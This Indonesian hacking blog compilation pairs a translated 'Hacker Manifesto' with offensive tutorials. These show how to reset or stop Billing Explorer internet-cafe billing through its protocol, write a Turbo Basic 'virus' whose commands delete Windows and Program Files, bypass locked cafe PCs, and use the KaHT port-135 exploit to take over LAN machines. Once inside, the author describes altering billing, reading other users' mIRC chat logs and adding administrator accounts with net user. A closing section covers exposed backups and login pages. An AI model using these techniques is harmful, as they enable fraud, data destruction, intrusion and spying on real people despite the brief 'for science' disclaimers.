Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.

Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers. 

 Deklarasi (Manifesto) Seorang Hacker

Hello Sobat HC..
Bagi kamu semua yang merasa ingin menjadi seorang Hacker...Ini adalah hal yang harus kalian ketahui..jangan sampai ketika kalian menghadapi sesuatu yang sulit kalian hanya berdiam diri..tetapi kita sebagai hacker juga mempunyai Deklarasi yang akan membuat orang yang berpikiran negatif pada kita hanya akan gigit jari...Manifesto ini adalah patokan bagi seluruh Hacker di dunia yang menjalankan misi perdamaian yang kadang di salah artikan...
 

Manifesto atau Deklarasi ini di buat oleh seorang Hacker yang menggunakan nickname The Mentor dan pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Berikut isi Manifesto tersebut :
"Ini adalah dunia kami, dunia electron dan switch..dan keindahan sebuah system
Kami mendayagunakan  sebuah system yang telah ada tanpa membayar..yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan dan kalian sebut kami criminal
Kami menjelajah dan kalian sebut kami criminal
Kami mengejar pengetahuan dan kalian sebut kami criminal
Kami hadir tanpa perbedaan ras,kebangsaan dan keyakinan agama dan kalian sebut kami criminal
Kalian membuat bom atom, mengejar peperangan, membunuh dan berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut criminal
Ya, aku memang criminal
Kejahatanku adalah rasa keingintahuanku
Kejahatanku adalah menilai orang dari apa yang mereka katakan dan pikirkan bukan dari penampilan mereka
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kalian maafkan
Aku memang Seorang Hacker...kalian bisa saja menghentikanku, tetapi kalian tidak bisa menghentikan kami semua. Bagaimanapun juga, kami senasib seperjuangan."
Sekian dulu Postingan saya dan pesan untuk sobat semua yang ingin menjadi seorang Hacker sejati perlu ketekunan..dan juga selalu mempelajari hal baru dalam dunia maya.. ok
Karena Banggalah menjadi Hacker demi kepentingan orang lain..

 Aku Bangga Menjadi Hacker



 Pagi Sobat Hacking Crew B.J.M

Banyak yang mempertanyakan kredibilitas seorang Hacker itu...diantaranya malah berkata dengan nada sinisme dan berbau ejekan...
Apa mungkin orang biasa seperti aku bisa menjadi Hacker Sejati..???
Apa benar kau memang seorang Hacker ???
Awas ada Hacker..! ! ! hehehe

Tapi percayalah kawan...Yang berkata buruk itu hanyalah orang yang iri dan tidak mengakui keberadaan kami sebagai kaum intelektual Cyber world...mereka takut tersaingi dan menjatuhkan mereka.


Tulisan ini mungkin bisa menjawab pertanyaan itu..karena tulisan ini mewakili seluruh Kaum CyberWorld (Hacker,Cracker,Coder,Defacer,Virus Creator,Blogger,dll)


Hacker, Kami Suka Dengan Kata Ini. Sejak Kami Kenal Internet Kami Sudah Suka Dengan Kata Hacker. Terserah Anda Mau Bilang Kami Apa, Yang Jelas Kami Bangga Menjadi Hacker.
Ya! Itulah Kami, Hacker Adalah Sebuah Impian Dan Imajinasi Tanpa Batas. Yang Setiap Orang Mungkin Tidak Bisa Memilikinya.
Hacker, Ya Itu Kami, Karena Dengan Kata Itulah Kami Mau Belajar, Setidaknya Bisa Belajar Sendiri. Sebab Di Sekolah, Kampus, Dan Di Lembaga Ilmu Pendidikan Kami Hanya Sedikit Mendapatkan Ilmu. Apa Gunanya Kalau Bisanya Cuma: “Tolong Itu Di Pelajari Sendiri Ya?”. Lebih Baik Kami Terinspirasi Dengan Kata Hacker Yang Membuat Kami Maju Dan Semangat Untuk Belajar Dan Belajar Lagi. Orang Bodoh Sekalipun Pasti Mau Belajar Kalau Mendengar Kata Hacker. Sampai Kami Sendiri Sering Mendengar: “Bagaimana  Sih Caranya Menjadi Hacker“. Ya! Itulah Kami, Inspirasi Tanpa Batas Dengan Menjadi Hacker.
Kami Hacker! Kami Tidak Peduli Apa Kata Orang, Yang Jelas Kami Tahu Sendiri Itu Ada Dalam Diri Kami. Inilah Perjuangan Kami, Inilah Takdir Kami, Inilah Jalan Kami, Inilah Darah Kami, Inilah Pikiran Kami Dan Inilah Kehidupan Kami.
Dunia Maya Itu Luas Bung, Jangan Pernah Mengambil Sesuatu Dari Sebuah Persepsi Dan Menyalahkan Kami Sebagai Hacker! Sekali Lagi, Dunia Maya Itu Luas Dan Ini Dunia Global Bung! Bukan Hanya Dunia Milikmu! Kami Bebas Melakukan Apa Yang Kami Inginkan Di Internet. Karena Dunia Kami Adalah Dunia Maya Dan Dunia Open Source.
Hidup Kami Antara 0 Dan 1, Dimana Dengan Dua Hal Tersebut Kami Menemukan Partikel Partikel Dunia Visual. Dengan 0 Dan 1 Kita Bisa Mengkonversi Pikiran Kita Menjadi Lebih Bervariasi Dan Inovasi Yang Tak Kenal Henti. Kami Adalah Genetika Yang Yang Tak Pernah Lelah Untuk Berusaha Mencari Apa Saja Yang Bisa Kami Angkat Untuk Dijadikan Bahan Uji Coba Demi Memaksimalkan Ide Yang Ada Di Pikiran Kami. Kami Adalah Sekelompok Orang Yang Tak Akan Pernah Melepas Suatu Kesempatan Untuk Dilewatkan Dan Kami Tak Akan Pernah Lelah Untuk Mencoba Serta Terus Mencoba.
Kami Bisa Masuk Komputer Orang, Kami Bisa Akses Komputer Orang, Kami Bisa Oprek Komputer, Kami Bisa Bikin Program, Kami Bisa Melakukan Apa Yang Anda Tidak Bisa Lakukan. Lantas Kenapa? Apa Salah Kami? Kemudian Anda Bilang Kami Kriminal? Anda Salah Besar Bung! Inilah Dunia Kami Yang Penuh Keingintahuan Tentang Ilmu Pengetahuan. Inilah Kriminal Yang Anda Salah Artikan, Kriminal Yang Sebenarnya Telah Terukir Di Kepala Anda Kalau Hacker Adalah Kejahatan! Karena Anda Tidak Tahu Dan Tidak Mengerti Sama Sekali Tentang Kami. Perhatikan Kami Bung, Inilah Kami Yang Anda Sebut Sebagai Para Kriminal, Yang Tidak Pernah Melakukan Kekerasan, Yang Haus Akan Pembelajaran, Yang Menginginkan Kemajuan, Yang Memiliki Motivasi Dan Persahabatan.
Kami Ingin Bebas Dalam Berkomunikasi Dan Menggunakan Informasi, Bebas Menganalisa Code Dan Script. Bebas Bertukar, Belajar, Berbagi Dan Membagi Antara Satu Dengan Yang Lainnya. Inilah Kami, Yang Akan Menggunakan Otak Kami Untuk Menemukan Sesuatu Yang Belum Anda Temukan. Kami Ingin Bebas Dalam Berselancar Di Dunia Maya, Sehingga Tidak Ada Sesuatu Apapun Yang Bisa Menghalagi Keinginan Kami Untuk Mencari, Menemukan, Memberi, Dan Memanfaatkan Apa Yang Kami Yakini. Kami Juga Menginginkan Kebebasan Dalam Mengeksplore Ide Ide Kami. Menjelajahi Bit Bit Dunia Maya Yang Tanpa Batas, Sehingga Membuka Lebar Cakrawala Ilmu Pengetahuan Bagi Kami, Anda Dan Semua Orang.
Inilah Definisi Tentang Hacker Yang Perlu Anda Pahami:
Hacker adalah sebutan untuk mereka yang menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Hasil pekerjaan mereka biasanya dipublikasikan secara luas dengan harapan sistem atau software yang didapati memiliki kelemahan dalam hal keamanan dapat disempurnakan di masa yang akan datang.
Dan Dengar Sahabat, We Are Hacker! Ini Adalah Manifesto Kami. Kebesaran Seseorang Tidak Terlihat Ketika Dia Berdiri Dan Memberi Perintah, Tetapi Ketika Dia Berdiri Sama Tinggi Dengan Orang Lain Dan Membantu Orang Lain Tersebut Untuk Mengeluarkan Yang Terbaik Dari Diri Mereka Untuk Mencapai Kesuksesan Bersama². Dan Ingat Sahabat! Jika Anda Bertemu Dengan Hacker, Cracker, Coder, Blogger, Defacer, Virus Creator Dan Cyber Lainnya Yang Katanya Kriminal Cyber! Percayalah, Bahwa Sesungguhnya Anda Telah Bertemu Dengan KAUM INTELEKTUAL Yang Belum Anda Ketahui.

 Hack Billing Explore Terbaru

PERTAMA – TAMA SAYA INGIN MEMBERI TAHU BAHWA INI HANYA SEMATA – MATA HANYA UNTUK KEPENTINGAN ILMIAH SAJA JADI DIBUTUHKAN HATI NURANI ANDA ! ! ! ^_^


Untuk mencoba artikel ini, anda bisa mendownload program billing explorer demo di situs http://www.billingexplorer.com
- Server Side
- Client Side

Saya asumsikan bahwa anda sudah mendowload dan menginstall di lokal komputer.
Kali ini kita coba dilokal terlebih dahulu, sebelum kita pergi ke warnet untuk melakukan percobaan artikel ini


Pengiriman data dari Client keserver biasanya diawali dengan kata kunci:
XX2
sedangkan pengiriman data dari Server ke client selalu diawali dengan kata kunci :
YA6
Nah pasti diantara pembaca bertanya2, gimana caranya mendapatkan nilai2 tersebut?..bingung kan?….sebetulnya sih gampang aja, kita gunakan program paket sniffer untuk melihat paket data yang masuk dan paket data yang keluar.
kalo mau coba-coba bisa menggunakan program ‘ether detect packet sniffer’ di www.etherdetect.com

ok, kita balik lagi ke pembahasan kita…..
ada beberapa perintah yang dikirim oleh client ke server, seperti:

Client Command
——————
$ablock$
$ablock2$
$act$
$ajblock$
$cekc$
$cektime$
$con$
$con1$
$con1dis$
$data$
$dina2$
$gpass$
$group$
$hblock$
$infod_0$
$infod_1$
$infod2$
$infod3$
$infod32$
$infod4$
$infouser$
$member$
$movecek$
$okmove2$
$paket$
$passA$
$pelajar$
$personal$
$rental$
$ruser$
$ruserh$
$send$
$sendcc$
$okmove1$
$tutup$

perintah-perintah tersebut saya dapatkan berdasarkan hasil decompiler program dengan menggunakan software vbLite & W32Dasm.
Setelah kita mengetahui beberapa perintah diatas, kita bisa mencoba langsung dengan menggunakan perintah-perintah tersebut.
kita gunakan komponen winsock untuk melakukan koneksi ke server, biasanya program B-Exp menggunakan port 1500 (default)
jadi kita bisa menuliskan syntax berikut:

Winsock1.Connect “192.168.0.1″,1500
artinya kita akan melakukan koneksi ke 192.168.0.1 dengan port 1500.
setelah anda berhasil terhubung keserver yang anda harus lakukan adalah mengirim inisialisasi paket data, agar program tersebut menerima permintaan kita.
adapun data yang dikirim adalah:

XX2$dina2$$$
diisi dengan pc yang akan kita gunakan sebagai inisialisasi koneksi.
contoh:

Winsock1.sendData “XX2$dina2$1$budak baonk$”
(artinya: kita melakukan koneksi sebagai komputer no 1 dengan nama budak baonk)
kalo pengiriman data berhasil, maka program B-Exp server akan mengirimkan data
“YA6$/connn$” yang artinya kita sudah terkoneksi ke billing dan program billing sudah siap menerima perintah2 yang dilakukan oleh program client.

Selanjutnya untuk memulai perhitungan billing kita bisa menggunakan dengan perintah: XX2$con$2
Winsock1.SendData “XX2$con$1″
Perintah diatas juga bisa digunakan untuk mereset durasi/lama penggunaan billing.
jadi kalo anda udah pake selama 10 jam bisa balik lagi ke 0 jam dengan perintah tersebut

Nah selanjutnya untuk memberhentikan penggunaan billing kita bisa lakukan dengan mengirim perintah: XX2$web2$1$Hacker
Winsock1.SenData “XX2$web2$1$budak baong”
perintah diatas bertujuan untuk menghentikan penghitungan billing pada no Pc 1 dengan nama budak baong. jadi kita bisa menghentikan selain pc yg kita pake, dengan merubah no pc.
gampang kan, so….kalian bisa coba-coba dengan perintah-perintah lainnya…kalo masih tetep bingung cara bikin programnya….hmm.mm…..jangan khawatir aku dah bikin programnya, jadi tinggal pake aja coy…
Download Sock B-Exp flooder : http://www.vbbego.com/files/billEX.rar
—-
Cara Kedua
Untuk artikel selanjutnya penulis akan mencoba kembali memperlihatkan bagaimana
menggunakan Billing Explorer Client dengan login Admin.

Biasanya untuk login dengn jenis admin perhitungan billing otomatis tidak
berjalan (disable) untuk memulainya anda harus mendownload terlebih dahulu tool
yang sudah dibuat:

Download hack-Bexp : http://www.vbbego.com/files/hackbillEX.rar
Setelah selesai download toolsnya, kita bisa langsung mencobanya.
ada beberapa langkah yang harus anda ikuti:

Anda login terlebih dahulu ke program billing spt biasa, dengan memilih jenis personal dengan nama login “baong”
Setelah login maka secara otomatis program billing akan bekerja seperti biasa untuk menghitung lama penggunaan internet. Selanjutnya kita bisa jalankan tools yang tadi kita download untuk memulai melihat-lihat ada apa dibalik program B-Exp (billing explorer).
Secara otomatis program akan mencari apakah program billing berjalan di komputer atau tidak, dengan mencari caption id “????A?|A?” , apabila tidak ada maka program akan langsung keluar dan proses akan berhenti.
Apabila program billing ditemukan maka, program tersebut akan merubah parrent dari program billing explorer ke program “Hack B-Exp”,program billing sekarang sudah
terperangkap didalam “hack b-exp” selain itu anda bisa lihat daftar HWND ID yang terdapat pada listbox, dimana kita bisa menampilkan objek-objek yang tersembunyi.

Biasanya kalo kita mengklik tombol Admin maka program Billing menyuruh kita memasukan password, tapi jangan khawatir…itu sangat mudah untuk dilewati.
ada yg tau gimana caranya……..pasti belum donk….

nah untuk masuk ke menu setting admin yang perlu kita lakukan adalah mencari kata #root:Administrator pada daftar handle windows.
ya kalo udah gini terserah anda, mau login gratis tinggal klik tombol Login, atau merubah setting lainnya ya bebas aja. Jadi silahkan coba klik item-item yang ada pada daftar handle window dan lihat apa yang tersembunyi di program billing tersebut.
Ternyata tidak sulit juga kan, kenapa demikian……he…he… semua ini
disebabkan pembutan setting dan login digabungkan dalam satu form dengan hanya memainkan properti VISIBLE…dan ini membuat mudah untuk ditampilkan kembali.

Mudah-mudahan artikel ini dapat mejadi bekal anda dalam membuat program, dan mengambil sedikit pelajaran sehingga tidak terjadi di setiap program yang kita buat.

 DANGER ! ! ! Membuat Virus

Download Turbo Basic disini

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus. 

 Cara Mengetahui IP address komputer lain

Buat yang blom tau ja ya.... sory juga klo repost

Disini akan dibahas :
1. Melacak alamat IP suatu situs
2. Melacak Real Adress server suatu situs
3. Cara Mengetahui IP address lawan chatting kita

-== Pembahasan ===-

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING -WWW.SITUS-YANG-DILACAK.COM- lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka http://www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di http://www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Tutorial Hacker Part 2 :

Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak yang tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :

1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties
2. Di properties pilihlah find target
3. Muncul Window lalu pilih search diatas
4. Pada Search pilihlah "All Files and folders"
5. Lalu cari file "cmd.exe" di windows
6. Jika di temukan maka jalankan file cmd.exe.
7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata
penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini

1. Masuk ke Notepad / Wordpad / Ms Word
2.Lalu ketik dibawah ini REGEDIT4
[HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows \""CurrentVersion\""Policies\""System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows \""CurrentVersion\""Policies\""Explorer] "NoRun"=dword:00000000
3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.
4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara
Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut.

Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\""KaH) maka ketikkan "CD\""KaHT" dan seterusnya.

Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\""windows\""system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\""Program Files\""MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat "/logs" maksudnya kalau tadi di C:\""program Files\""MiRC program MiRCnya maka cukup masuk aja di C:\""Program Files\""MiRC\""Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer
sumber : kaskus.us

 Berburu Direktori dan File Sensitif dengan DirBuster

Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi.
Direktori Sensitif
Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain:
  • Backup
Hal yang biasanya dibackup adalah database dan source script webnya. Bayangkan apa yang terjadi bila hacker berhasil mendapatkan seluruh file php dan “database dump” dalam satu file zip? Kalau anda berpikir itu tidak mungkin terjadi, anda salah besar, karena saya sering menemukan file backup berekstensi zip, tar.gz, atau sql berserakan di websitenya.
  • Halaman Login
Ada banyak macam halaman login, umumnya adalah halaman login untuk mengelola isi website, yaitu CMS Administrator. Selain CMS, halaman login yang lain adalah phpMyAdmin, cpanel, Tomcat Admin Page, AXIS2 Admin Page dll. Tomcat dan AXIS2 adalah Java based webserver dan web service platform.
Kenapa halaman login termasuk sensitif? Karena dengan mengetahui URL untuk menjadi Administrator website, seorang hacker bisa melakukan serangan SQL Injection, password guessing, dictionary attack dan brute force attack untuk membuat dirinya menjadi seorang administrator di website anda. Celakanya banyak website yang halaman login adminnya tidak menggunakan password yang kuat, bahkan menggunakan password default.
  • Log file
Log file biasanya dipakai untuk tujuan debugging atau penelusuran kesalahan oleh web developer. Karena itu tidak heran bila dalam log file banyak mengandung informasi sensitif yang bisa dimanfaatkan hacker. File log ini berbeda-beda tergantung dari web aplikasi yang dipakai karena web developer punya kebebasan untuk membuat  atau tidak membuat file log.
Salah satu contoh log file yang biasa ditemukan di web adalah WS_FTP.LOG, file ini dibuat oleh program WS_FTP, yaitu FTP Client. Setiap kali memakai program ini untuk upload ke web anda, WS_FTP akan otomatis memasukkan file WS_FTP.LOG ke dalam folder website anda. Dalam file WS_FTP.LOG ini seorang hacker bisa mendapatkan banyak informasi sensitif: antara lain IP address web server anda (banyak web yang menyembunyikan IP address sebenarnya dibalik NAT), full path lokasi document root web anda, username account hosting anda (bila dalam full path mengandung nama seperti /home/username/…./).
WS_FTP.LOG juga bisa membocorkan isi sebuah direktori bila anda sudah mematikan fitur “Directory Indexing” atau membuat file index.html kosong. Seorang hacker yang tidak bisa melihat isi direktori karena directory index dimatikan atau ada file index.html kosong, bisa mencoba membuka WS_FTP.LOG di direktori itu. Bila ternyata file WS_FTP.LOG ada, maka file log itu akan membocorkan isi file dalam direktori tersebut.
Pesan error di atas umumnya dijumpai pada direktori yang ada, tapi directory indexing tidak diaktifkan, sehingga anda harus menebak nama file yang ada di direktori tersebut. Bila directory indexing diaktifkan, maka anda akan menemukan halaman dengan title “Index of /”.
  • Versi Lama
Terkadang ketika sebuah website diupdate ke versi baru, file-file script lama disimpan dalam satu direktori bernama oldversion, version1 dan versi barunya dalam direktori /new/ atau /ver2/ atau /beta/. Menemukan beragam versi suatu web adalah kesempatan emas untuk menemukan celah keamanan karena biasanya web versi terbarunya memang tidak mengandung kelemahan, namun bila kita berhasil menemukan versi lamanya, akan ditemukan banyak celah keamanan.
